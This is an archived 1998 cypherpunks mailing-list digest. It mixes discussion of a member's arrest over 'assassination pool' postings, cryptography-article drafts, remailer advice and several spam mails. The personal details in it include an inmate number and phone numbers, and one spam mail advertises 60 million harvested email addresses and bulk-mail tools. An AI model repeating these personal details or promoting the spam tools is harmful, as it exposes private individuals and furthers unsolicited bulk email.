J Orlin Grabbe  http://www.aci.net/kalliste/ 
 
I'm going to write an article for The Laissez Faire City Times 
http://zolatimes.com/ 
 
	Black and White Test of Cryptographic Algorithms 
 
I have what I want to write CLEARLY in mind.   
 
THINKING before DOING works better than the CONVERSE.  But this takes 
time, of course. 
 
How much $s would such an article be worth? 
 
We have to keep in mind WHY we are doing all of this.   
Like what Baranyi is doing at http://www.qainfo.se/~lb/crypto_ag.htm 
 
I will write when I take breaks from debugging and documenting digital
FX hardware. 
$s, again.  The digital FX was HOPEFULLY very well thought-out and will
work reliably 
in the field. 
 
Here are SOME of my references. 
--- 
*AES* 
http://www.aci.net/kalliste/cryptnum.htm 
 
http://csrc.nist.gov/encryption/aes/aes_home.htm 
http://www.ii.uib.no/~larsr/bc.html 
http://www.jya.com/frog-hack.htm 
http://csrc.nist.gov/encryption/aes/round1/docs.htm 
http://www.jya.com/aes-mail.htm 
 
http://www.softwar.net/hist.html 
 
http://www.aci.net/kalliste/speccoll.htm    
http://caq.com/cryptogate   
http://jya.com/whpfiles.htm   
http://www.qainfo.se/~lb/crypto_ag.htm 
 
                                    HOLLYWOOD (October, 1997) -- London
Records is 
                                    pleased to announce the release of
Howard Shore's 
                                    original motion picture score to The
Game, starring 
                                    Michael Douglas and Sean Penn.  
 
                           The film is a thriller directed by David
Fincher (Se7en). "The Game" is 
                           what begins when a high-powered businessman
named Nicholas Van 
                           Orton (Douglas) receives the birthday gift of
a lifetime from his 
                           brother he alienated years ago (Penn). What
Nicholas gets is entry 
                           into a mysterious new form of entertainment
provided by C.R.S. 
                           (Consumer Recreational Services) simply
called "The Game." It 
                           proves to be an all-consuming contest with
only one rule: there are 
                           no rules. By the time Van Orton realizes he
is in, it is too late to get 
                           out. Laced with intrigue, action and danger
beyond belief, The Game 
                           ultimately draws to a cataclysmic close,
every step bringing Van 
                           Orton nearer to an explosive confrontation
with what threatens him 
                           most.  
 
                           Howard Shore has written a tense and gripping
score. The 
                           soundtrack features "White Rabbit" performed
by the legendary 
                           Jefferson Airplane.  
http://www.movietunes.com/soundtracks/1997/game/ 
 
          The contemplation of things as they are,       
                without error or confusion,       
            without substitution or imposture,       
   is in itself a nobler thing than a whole harvest of invention.       
       
   Francis Bacon        
     
 Stupidity is difficult to underestimate   
   Professor Robert Franklin Wallace - economics 
 
 Don't search for deeper explanations when stupidity will suffice 
   Professor Melvin Gordon Davidson - physics






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alia Johnson <lodi@well.com>
Date: Wed, 2 Sep 1998 18:55:39 -0700 (PDT)
To: joe harlin <joeharlin@hotmail.com>
Subject: Re: toto
In-Reply-To: <19980902200614.28540.qmail@hotmail.com>
Message-ID: <Pine.GSO.3.96.980902185416.759B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


C.J. was arrested for postings he made involving some kind of betting on
the death of certain listed IRS agents.

There is nothing in particular we are asking you to do; he just asked me
to let people know what is happening.

Thanks for asking. Alia Johnson


On Wed, 2 Sep 1998, joe harlin wrote:

> Alia,
> 
> I am a little confused.
> 
> What exactly did you brother do and what would you like us to do?
> 
> All the best.
> Joe
> 
> 
> 
> >Date: Wed, 2 Sep 1998 11:01:10 -0700 (PDT)
> >From: Alia Johnson <lodi@well.com>
> >To: John Young <jy@jya.com>
> >cc: cypherpunks@toad.com
> >Subject: Re: toto
> >
> >Thank you. CJ's inmate number at CCA is 05 98 7196. The phone there is 
> 520
> >868 3668. Of course you can't call him, and mail delivered to the 
> prison
> >ten days ago has not reached him.NEW INFO: I JUST CALLED THE ATTORNEY'S
> >OFICE AND HIS SECRETARY INFORMS ME THAT THE HEARING HAS BEEN CANCELLED 
> AND
> >THE JUDGE HAS ORDERED HIM MOVED TO 'AN APPROPRIATE PSYCHIATRIC 
> FACILITY'
> >FOR EVALUATION. THE RUMOR IS THAT THIS IS THE ONE IN SPRINGFIELD,
> >MISSOURI. CJ HAS BEEN INFORMED OF THIS, AND THERE IS ALSO A RUMOR THAT 
> HE
> >IS IN ISOLATION AND NOT ALLOWED TO MAKE PHONE CALLS. I WILL KEEP YOU
> >INFORMED OF FURTHER DEVELOPMENTS.
> >ALIA
> >
> >On Wed, 2 Sep 1998, John Young wrote:
> >
> >> Alia,
> >> 
> >> We've put the court docket on Toto's case at:
> >> 
> >>    http://jya.com/cej-bust.htm
> >> 
> >> Also, we've left an inquiry at his attorney's
> >> office (who's in LA today) for more information:
> >> 
> >>   John G Bogart, Esq
> >>   70 W Franklin St
> >>   Tucson, AZ 85701
> >>   (520) 624-8196
> >> 
> >> Let us know what you learn at the court hearing
> >> if you attend and give Toto a hug and kiss (and a 
> >> handcuff key). Tell him to call me if he can and wants
> >> to:
> >> 
> >>    (212) 873-8700
> >> 
> >> John Young
> >> 
> >> -----
> >> 
> >> To cpunks: I seemed to have misplaced Toto's Cafe
> >> Gulag post. I'd appreciate a copy or a pointer. Thanks.
> >> 
> >> 
> >> 
> >> 
> >> 
> >
> >
> 
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl <netmedia12@hotmail.com>
Date: Wed, 2 Sep 1998 22:14:29 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Sex Story Post
Message-ID: <419.436041.05420139netmedia12@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, Carl here from An Alien's Guide to Internet Sex

You should not be receiving this email unless you are an adult Webmaster and 
have submitted a link to Alien's.  This is my personal mailing list and was not  
purchased or acquired by any other means.

I would like to announce the opening of my newest website,  

Sex Story Post:    http://www.sexstorypost.com/index.html

After only 1 week, Sex Story Post is getting over 6,000 Unique visitors a day.

This site is run just like the pic post sites but uses stories instead of pictures.  
Studies have shown that visitors looking for stories are more likely to produce sign-
ups.  Why? Who the hell knows, maybe it is because they can read well enough to 
sign up for a credit card.  

What does this do for you?  Aren't we all looking for quality traffic?  Also, there are 
several sponsors out there that will allow you to post their banner to pic post and 
STORY POST sites as well.

So come, add your story and your banner, and get your share of these great 
revenue producing surfers.  

You can go straight to the submit page at:  
http://www.sexstorypost.com/picpost/add,html

Thanks,

Carl



PS.  while you are there add your link to the links page.

My Newest site:  
	SEX STORY POST http://www.sexstorypost.com/linkadmin.html
	
Also come add your link to my other pages:
 	Tongue Chow.  http://www.tongue-chow.com/main.html
 	Wanker Zone http://www.wankerzone.com/
	FREE Hardcore Pics and Erotic Stories  http://www.fahking.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 2 Sep 1998 17:22:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: mailing list
Message-ID: <e5a62e2c7116d768c08a4cceb778b291@anonymous>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Sep 1998, MD Dodson wrote:

> how do I join?

Well, first you inform the refueler of your intention and wait for
clearance. You'll be cleared for either the left or the right hose. Pull
in behind and deploy your refueling probe if your aircraft has one. Ease
it into the basket and hold the aircraft steady until refueling is
complete. 

Another option is to go for a swim inside the refueling tank. You'll join
your ancestors quickly.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: martin..@iname.com
Date: Thu, 3 Sep 1998 00:54:14 -0700 (PDT)
To: cypherpunks@toad.com
Subject: setting up a remailer service
Message-ID: <199809030754.DAA01354@web05.iname.net>
MIME-Version: 1.0
Content-Type: text/plain


Yoppa!

As I am getting a cable modem installed today, I'd like to set up a free remailer service for the internet community. I have a static IP, good disk space and my machine is located in Norway. Ideally I'd like to do something along the lines of anon.penet.fi. Any tips or suggestions are most welcome, but I'm *not* setting up a warez/porn site or anything like that.

Regards

.martin

---------------------------------------------------
Get free personalized email at http://www.iname.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "joe harlin" <joeharlin@hotmail.com>
Date: Thu, 3 Sep 1998 06:01:54 -0700 (PDT)
To: lodi@well.com
Subject: Re: toto
Message-ID: <19980903130120.9782.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Alia,

What was he charged with?

Does he have a criminal record?

Where did he make these postings?

Do they think he had anything to do with the death of IRS agents.

Be well,
Joe


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 2 Sep 1998 22:26:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Eternity servers, SSL home pages
Message-ID: <199809030526.HAA01214@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


I was just browsing replay and I ran into a server on it called an
eternity server, That one wont let me use it because of permissions. 
I was wondering if there was another one around that has been tested
recently.

Also I was curious as to whether there were any crypto conscous ISP
that let you have a page with SSL cheap if it was just an ifo page and
not a commercial site.  Any help would be Appreciated.
==

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 3 Sep 1998 06:35:17 -0700 (PDT)
To: j orlin grabbe <abumujahid@taliban.com
Subject: Zurich trip
Message-ID: <35EE99DF.6F6F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 9/3/98 6:10 AM

J Orlin Grabbe  http://www.aci.net/kalliste/

Patty and I went to Zurich last April. 

  Implementing Basics : How Basics Work           
  William H. and Patricia Payne / Published 1982           
  http://www.amazon.com 

I interviewed for a job at IBM Zurich forschungslabortorium.
http://www.zurich.ibm.com/

We left from Atlanta.

The Swissair 747 was operated jointly by Delta and Swissair. 
http://www.swissair.com/

From: "Matthias Kaiserswerth"<kai@zurich.ibm.com>
To: billp@nmol.com
Message-Id: <C12563F0:0040D20D.00@notesmta.zurich.ibm.com>
Date: Thu, 28 Nov 1996 12:54:38 +0200
Subject: Re: Settlement and talk title

  Bill,

  I cannot comment on your legal battles - they seem to be quite
  difficult and require a great deal of courage if waged against a
  government.

  I wish you the best of luck - it sounds like a nightmare or as written
by
  Kafka.

  Anyway, the title for your talk sounds very interesting. Could you
also
  write up an  abstract and make it reasonably technical, because this
is what people
  will  be interested in.

  I'm looking forward, once you have your passport, to arrange a date
with
  you to come here for the interview and to meet us.

  Kind regards
       Matthias

My talk title was

	Dangers in High Tech Espionage

GETTING CAUGHT, of course, is one DANGER in high tech espionage.

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm

Let's all hope for settlement of this UNFORTUNATE MATTER before things
GET
WORSE.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Axel Bodemer <axel.bodemer@omp.de>
Date: Wed, 2 Sep 1998 23:20:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: list
Message-ID: <19980903082028.A28784@omp.de>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alia Johnson <lodi@well.com>
Date: Thu, 3 Sep 1998 09:13:06 -0700 (PDT)
To: joe harlin <joeharlin@hotmail.com>
Subject: Re: toto
In-Reply-To: <19980903130120.9782.qmail@hotmail.com>
Message-ID: <Pine.GSO.3.96.980903091142.10914B-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


	

On Thu, 3 Sep 1998, joe harlin wrote:

> Alia,
> 
> What was he charged with?
> THREATENING THE LIFE OF A FEDERAL AGENT
> Does he have a criminal record?
> I DON'T KNOW.
> Where did he make these postings?
> I'M NOT SURE; IN SOMETHING TO DO WITH JIM BELL'S ASSISINATION POOL I
THINK.
> Do they think he had anything to do with the death of IRS agents.
> I DON'T THINK SO. DID ANYBODY DIE?
> Be well,
> Joe
> 
> 
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 2 Sep 1998 18:54:23 -0700 (PDT)
To: tleininger@moraine.tec.wi.us
Subject: Re: Cypherpunks HyperArchive
In-Reply-To: <86256673.00601940.00@moraine.tec.wi.us>
Message-ID: <Pine.GSO.3.96.980903092201.21607A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


I too cannot open it.
It says in my screen 
      FORBIDDEN 
  well my server is not allowed to access that ~/cypherpunks/
    that's why I cannot go to it.

One question, the site where it is located, is it a university?
What school?

Thank you.




To do the right thing(s) for the wrong reason(s) is human,
  To do the right thing(s) for the right reason(s) is divine.


metaphone@altavista.net

On Wed, 2 Sep 1998 tleininger@moraine.tec.wi.us wrote:

> I would appreciate it if you could help. For some time now I've read the
> Cypherpunks HyperArchive
> (http://infinity.nus.sg/cypherpunks/), and now I can't get it. I don't
> believe it's being blocked on my end - whats up?
> Thank's for your time. TLL
> 
> 
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 2 Sep 1998 18:55:34 -0700 (PDT)
To: tleininger@moraine.tec.wi.us
Subject: Re: Cypherpunks HyperArchive
In-Reply-To: <Pine.GSO.3.96.980903092201.21607A-100000@mudspring.uplb.edu.ph>
Message-ID: <Pine.GSO.3.96.980903093149.22043A-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain


National University of Singapore 

> I too cannot open it.
> It says in my screen 
>       FORBIDDEN 
>   well my server is not allowed to access that ~/cypherpunks/
>     that's why I cannot go to it.
> 
> One question, the site where it is located, is it a university?
> What school?
> 
> Thank you.
> 
> 
> 
> 
> To do the right thing(s) for the wrong reason(s) is human,
>   To do the right thing(s) for the right reason(s) is divine.
> 
> 
> metaphone@altavista.net
> 
> On Wed, 2 Sep 1998 tleininger@moraine.tec.wi.us wrote:
> 
> > I would appreciate it if you could help. For some time now I've read the
> > Cypherpunks HyperArchive
> > (http://infinity.nus.sg/cypherpunks/), and now I can't get it. I don't
> > believe it's being blocked on my end - whats up?
> > Thank's for your time. TLL
> > 
> > 
> > 
> 
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Thu, 3 Sep 1998 12:05:34 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - September 3, 1998
Message-ID: <199809031858.NAA27527@revnet3.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

One of your customers just made
three really long distance calls.....simultaneously.
Have you deployed authentication?
CTIA's Wireless Security '98 - It's Just Smart Business.
Orlando, Florida  November 9 - 11, 1998
http://www.wow-com.com/professional
===========================================
Title: _CTIA Daily News From WOW-COM_



 










 





CTIA
Daily News from WOW-COM - September 3, 1998
















CTIA Adds Internet Y2K
Site for Wireless Industry







The Cellular Telecommunications Industry
Association has added a new section to its web site dealing with the Year
2000 computer problem.  The site is designed to be a resource regarding
Y2K and the wireless industry. (WOW-COM)















Audiovox FoneFinder Phone
Will Track Callers' Locations For 911 Centers







Audiovox's new phone to be released in
November will assist 911 centers by dispatching the caller's precise latitude
and longitude by using global positioning satellite service.  The
Audiovox FoneFinder can be used with any wireless service provider without
additional fees for calls that use the GPS feature. (SFGATE)















Virginia Beach Tower
Siting Decision Issued by Federal Appeals Court 







United States Fourth Circuit Court issues
decision supporting city council in a tower dispute. (PILOT)
(EMORY)















The Michigan Technology
Commission's New Survey Reveals That More Than 50 Percent of 1000 People
Surveyed Are Cell Phone Users.







According to the survey, the number of
cell phone users in Michigan well exceeds the national average of 39 percent. 
Participants were selected from within the Detroit City limits and tri-county
suburbs. (FREEPRESS)















Veridian Acquires Datumtech's
North American Operations







Veridian, parent company of Calspan Operations,
announced that the company has acquired Datumtech's North American operations. 
The acquisition creates one of the leading providers of automatic vehicle
location systems and mobile data terminals serving the public safety, commercial
and consumer markets. (WOW-COM)















Spyglass Develops The
"Device Mosaic Web browser" For Portable Devices.







The "Device Mosaic Web browser'' is Spyglass's
new Web browser for Microsoft's Windows CE operating system devices. 
This web browser provides more creativity in development applications.
(FOXNEWS)















Ongoing Internet Battles
Have Made Their Way To Handheld Devices







Handheld computers are the latest in the
battle for internet browsing despite the slow pace of wireless modems. 
Small software companies have begun producing Web access solutions for
use in handheld devices. (BOSTON)
(FOXNEWS)















Telecommunications Merger
Between SNET and SBC Communications







Southern New England Telecommunications
Corporation's merger with SBC Communications Inc. of San Antonio was approved
yesterday by the Connecticut Department of Public Utility Control. (BOSTON)















Year 2000 Presents Financial
Worries for Federal Agencies 







Clinton administration officials estimate
the Year 2000 computer problems for federal agencies to cost $5.4 billion
in repairs.  The Clinton Administration is working with Telecommunications
groups to protect companies fearful of sharing data that my later be used
against them in liability lawsuits. (WASHPOST)
























For additional news about
the wireless industry - including periodic news updates throughout the
day - visit http://www.wow-com.com.

CTIA Daily News from WOW-COM
is transmitted weekdays, except for holidays.  Visit us on the World
Wide Web at http://www.wow-com.com/professional.

Please Note: Some of the
links in today's news are time sensitive.  Those links may not be
available as news changes throughout the day.  Also, some news sources
may be subscription-based or require registration.
 
















CTIA Daily News from WOW-COM
is transmitted weekdays, except for holidays. Visit us on the World Wide
Web at http://www.wow-com.com/professional.  

If you are not interested
in receiving the CTIA Daily News from WOW-COM, please send a message to
unjoin-CTIA_Daily_News@um2.unitymail.com.  

*** The term "unjoin-CTIA_Daily_News@um2.unitymail.com"
must be listed in the TO section of the email. *** 

Please Note: Some of the
links in today's news are time sensitive.  Those links may not be
available as news changes throughout the day.  Also, some news sources
may be subscription-based or require registration.














 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Thu, 3 Sep 1998 11:04:31 -0700 (PDT)
To: (STUFFED THURSDAY SEPTEMBER 3 1998)
Subject: 16% of Americans agree with Clinton: "Oral sex not adultery"/30+ FREE PICS EVERY DAY FROM NOW ON!
Message-ID: <19980903140353.9972.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


OK.  The new pictures we ordered are now in,  so from now onwards
we'll be  giving you 30 FREE hi-res jpegs  (or more) every single
day. That means around 11,000 in a year!  Where else will you get
this much FREE?  That's right,  so come  back every day  for more
and more, such as the mpeg videos we'll be giving away FREE soon!

PLUS: PAGE 2 'SPREAD', THUMBNAIL HEAVEN, OUTRAGEOUS BUT TRUE SEXY
      NEWS,  HOT STORY - "METER'S RUNNIN'",  THE BEST OF EUREKA!,
      READERS' TRUE  SEX SECRETS,  SUPER  SEXY  SURPRISE  THUMBS,
      THUMBNAIL ORGY, ULTRA HI-RES POSTER PIC, & MUCH, MUCH MORE!

       ---->   http://stuffed.net/98/9/3/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/3/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rsriram@krdl.org.sg
Date: Thu, 3 Sep 1998 02:43:12 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: setting up a remailer service
Message-ID: <19980903174030.B4271@krdl.org.sg>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, Sep 03, 1998 at 03:54:04AM -0400, martin..@iname.com wrote:
| Yoppa!
| 
| As I am getting a cable modem installed today, I'd like to set up a free remailer service for the internet community. I have a static IP, good disk space and my machine is located in Norway. Ideally I'd like to do something along the lines of anon.penet.fi. Any tips or suggestions are most welcome, but I'm *not* setting up a warez/porn site or anything like that.
| 
| Regards
| 
| .martin


Check out MixMaster at ftp.replay.com/pub/replay/remailer/mixmaster





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 3 Sep 1998 19:38:52 -0700 (PDT)
To: georgefoot@oxted.demon.co.uk
Subject: diplomacy
Message-ID: <35EF519A.51D1@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Zola http://zolatimes.com/

I faxed the abstract to Grabbe.  Young's fax did not answer.

There are, I think, some crytpo problems posted at
http://www.jya.com/crypto.htm
http://www.cl.cam.ac.uk/~fapp2/papers/ec98-erl/

Problems should, of course, be pointed out with diplomacy characterized
in
http://www.aci.net/kalliste/apocalyp.htm

Later
bill

   Black and White Test of Cryptographic Algorithms

		Abstract

  Purpose of this article is to explain the underlying principles

  of cryptography by examples and explain why some criteria
  should be met by cryptographic algorithms for serious
  consideration of adoption.

revision 		date		time		author 		reason
0			9/3/98		6:49 PM		wh payne	first draft






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 3 Sep 1998 20:04:49 -0700 (PDT)
To: abumujahid@taliban.com
Subject: The Great Satan
Message-ID: <35EF579F.5FFF@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Thursday 9/3/98 8:53 PM

Greg Broiles
gbroiles@netbox.com

I read

http://www.jya.com/jdb-9ca-gb.htm

One has to be careful with the great satan.

Perhaps one needs a GOOD lawyer?

http://www.mgovg.com/ethics/index.html

I lived in the basement appartment of the Luce's home 
in Walla Walla during my jr/sr at Whitman college 1958/59.

Charlie JR was in the 'goo'- rug rat stage when I met him.

bill

Subject: 
        diplomacy
  Date: 
        Thu, 03 Sep 1998 20:34:02 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        eZola@LFCity.com, cypherpunks@toad.com,
ukcrypto@maillist.ox.ac.uk, biham@cs.technion.ac.il,
even@cs.technion.ac.il, wpi@wpiran.org,
        abd@CDT.ORG, merata@pearl.sums.ac.ir,
lawya@lucs-01.novell.leeds.ac.uk, sjmz@hplb.hpl.hp.com,
georgefoot@oxted.demon.co.uk
    CC: 
        jy@jya.com, john gilmore <gnu@toad.com>, j orlin grabbe
<kalliste@aci.net>, Ross.Anderson@cl.cam.ac.uk,
Vaclav.Matyas@cl.cam.ac.uk,
        fapp2@cl.cam.ac.uk


Zola http://zolatimes.com/

I faxed the abstract to Grabbe.  Young's fax did not answer.

There are, I think, some crytpo problems posted at
http://www.jya.com/crypto.htm
http://www.cl.cam.ac.uk/~fapp2/papers/ec98-erl/

Problems should, of course, be pointed out with diplomacy characterized
in
http://www.aci.net/kalliste/apocalyp.htm

Later
bill

   Black and White Test of Cryptographic Algorithms

                Abstract

  Purpose of this article is to explain the underlying principles

  of cryptography by examples and explain why some criteria
  should be met by cryptographic algorithms for serious
  consideration of adoption.

revision                date            time            author         
reason
0                       9/3/98          6:49 PM         wh payne       
first draft






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nue84@mci2000.com (Goodmail...Inc.)
Date: Thu, 3 Sep 1998 23:55:42 -0700 (PDT)
To: nue84@mci2000.com
Subject: Complete E-mail Business..
Message-ID: <199809033952BAA54769@cash.cedarnet.net>
MIME-Version: 1.0
Content-Type: text/plain


************************************************
THE MOST INCREDIBLE CD EVER OFFERED FOR
SALE TO MAKE UNLIMITED INCOME!!!!!!
************************************************
At a price you won't believe!

LOOK!

>>60 Million E-Mail Addresses
>>PLUS<<
>>500 "How To" Reports
>>7 Bulk Mail Tools & Programs
>>Over 50 Business Help Reports
>>300 Money Making Secrets & Sources
>>100 FREE Magazines
>>Juno - FREE E-Mail
>>McAfee - Viruscan
>>WinZip 95
and so much more!

TAKE A CLOSER LOOK!

1.	60 Million E-Mail Addresses.  Virtually everyone on line, including:

	> AOL
	> Compuserve
	> Prodigy
	> AT&T
	and more.......................................................................

2.	Seven Bulk Mail Tools and Programs, including:

	> Stealth
	> Pegasus
	> Goldrush - The most powerful e-mail program today
	> Floodgate - The best e-mail address extraction program
	> WinZip 95 - Open any zip files and manage them
	> Extract
===============================================================
NOT BULK MAILING???? GET RICH ON ALL THE POWERFUL MONEY MAKING 
INFORMATION INCLUDED IN THIS CD...ANYWAY YOU WANT TO USE IT!!!!
===============================================================

3.	500 "How To" Business Reports.  Each sold on the Internet 
	for as much as $100 each. Full resale rights available, make a 
	fortune on this information alone. INFORMATION IS POWER! Some 
	of these reports include:

	> How to Earn Extra Cash Using Your Computer
	> How to Improve Your Credit
	> How to Increase Your Cash Flow
	> How to Place Your Ads on the Internet
	> How to Get FREE Advertising
	> How to Become "Audit Proof"
	>  Plus, Women & Credit

===============================================================
NO MATTER WHO YOU ARE OR WHAT YOU'RE DOING NOW, THE INFORMATION 
IN THE 500 "HOW TO" REPORTS ALONE IS PRICELESS!!!
===============================================================

4.	300 Money Making Secrets.  Some include:

	> Selling products on a floppy disc
	> Powerful ad layouts
	> "There's Gold Inside Your PC"
	> Directory of FREE Business Sources
	> Making Your Own Products
	and many, many more profitable reports!!!!

5.	How To Get FREE Subscriptions to over 100 magazines.  Some 
	include:

	> Monetary Trends
	> Money Making Opportunities
	> Business Education World
	and many more!

6.	WinZip 95 Wizard. Will enable you to unzip and open zip 
	files as well as zip and close.  Features include:

	> Fast access to zip files in your favorite zip files
	> Auto install of software distribution in zip files
	> Fast, easy unzipping

7.	Juno - FREE E-Mail service information.  Juno is an 
	e-mail service that allows you to receive and send e-mail 
	anytime, absoulutely FREE.  All sign up information is included.

AND MORE!!!!

IF YOU CAN'T MAKE MONEY WITH THIS CD, YOU DON'T WANT TO!!!!!

ONE INCREDIBLE CD FOR ONE INCREDIBLE LOW PRICE OF ONLY................
                       $199.00
              (+ $3.80 shipping & handling)

ORDER NOW, YOU WON'T EVER SEE AN OFFER LIKE THIS AGAIN!!!!!!

1.	Phone orders.  Call (904) 721-9950, 24 hours per day, seven days per week.

2.	Mail your check or money order to:

	Kellner Enterprises
	P.O. Box 17834
	3650 Southside Blvd.
	Jacksonville, FL  32245-7834

3.	All major credit cards accepted.  Please complete the order 
form below and fax to (904) 721-0431 or mail credit card information 
to the address listed above.

<<<<<<<<<<<<<<<CREDIT CARD ORDER FORM>>>>>>>>>>>>>>>>>>>>

Type of Credit Card:_____________________________________________________
Expiration Date:_________________________________________________________
Name on Credit Card:____________________________________________________
Credit Card Number:_____________________________________________________
Billing Address:__________________________________________________________
	City___________________  State:____________________ Zip Code:________
Shipping Address (if different then above):___________________________________
	City___________________  State:____________________ Zip Code:________
Phone Number with area code:  (____) _______________________________________
E-Mail Address:_________________________________________________________

All orders will be shipped within 24 hours via First Class Mail, or 
priority overnight (via FedEx)

	Amount Due:		$199.00
	Add $3.80 S&H or
	$15.00 Fed Ex:	$______
	Total Amount Due:	$______


________________________________________
Signature of Cardholder

DON'T WAIT, ORDER TODAY!!!!!

THIS IS A ONE TIME OFFER!!!!

This message is sent in compliance with the new e-mail
bill: Per Section 301. Paragraph (a)(2)(c) of S. 1618;
All further e-mail sent to this address will be stopped
by simply sending a reply to this address with the word
REMOVE, in the message box. All requests are processed
immediately.
proces




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED NEWS DAILY <stuffed@stuffed.net>
Date: Fri, 4 Sep 1998 01:56:58 -0700 (PDT)
To: (STUFFED FRIDAY SEPTEMBER 4 1998)
Subject: Babes behind bars: Jailbabes looking for men/Over 30 Hi-Res, ultra-hot jpegs - FREE!
Message-ID: <19980904071000.23727.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


We've been beavering away (we wish :) to bring you today's
superb issue. It's packed with the best FREE photos, funny
(but true) sexy news, and so much more!

ALSO IN THIS ISSUE: PAGE 2 'SPREAD'; THUMBNAIL HEAVEN; ALL
JAZZ AND  NO JIZZ;  RUSSIAN  FOR LOVE;  MORE THUMBS;  SEXY
STORY  "SPECIAL DELIVERY";  THE BEST OF EUREKA!;  READERS'
TRUE SEX SECRETS;  EVEN MORE THUMBS; SEXY SURPRISE THUMBS;
TITS, GUNS & CHICKS IN TEL AVIV;  HI-RES POSTER PIC; MORE!

       ---->   http://stuffed.net/98/9/4/   <----

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL above.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the URL,  copy it and then paste it into your browser  (then
press Return).

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/98/9/4/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Digital Frontiers Info <info@digfrontiers.com>
Date: Fri, 4 Sep 1998 18:14:33 -0700 (PDT)
To: digf-offer@digfrontiers.interaccess.com
Subject: HVS Product Prices Cut by 30%
Message-ID: <v04011704b215d8f158fa@[207.70.117.43]>
MIME-Version: 1.0
Content-Type: text/plain


PRICE CUTS ON HVS PRODUCTS
--------------------------
Dear Web Developer/Designer:

Thank you for your interest in Digital Frontiers products. If you wish to
be removed from our announcement list, please reply to
info@digfrontiers.com.

Digital Frontiers is pleased to announce great new pricing discounts of
more than 30% on our award-winning HVS series of web graphics tools.

Starting September 1st, HVS Toolkit Pro 2 can be purchased for only $149.
HVS Toolkit Pro 2, for Macintosh and Windows, replaces HVS WebFocus
Toolkit, previously priced at $208, and adds HVS Animator Pro, by itself a
$79 value. The new HVS Toolkit Pro includes HVS ColorGIF 2, HVS JPEG 2 and
HVS Animator Pro, tools which still lead the industry in image quality and
compression power.

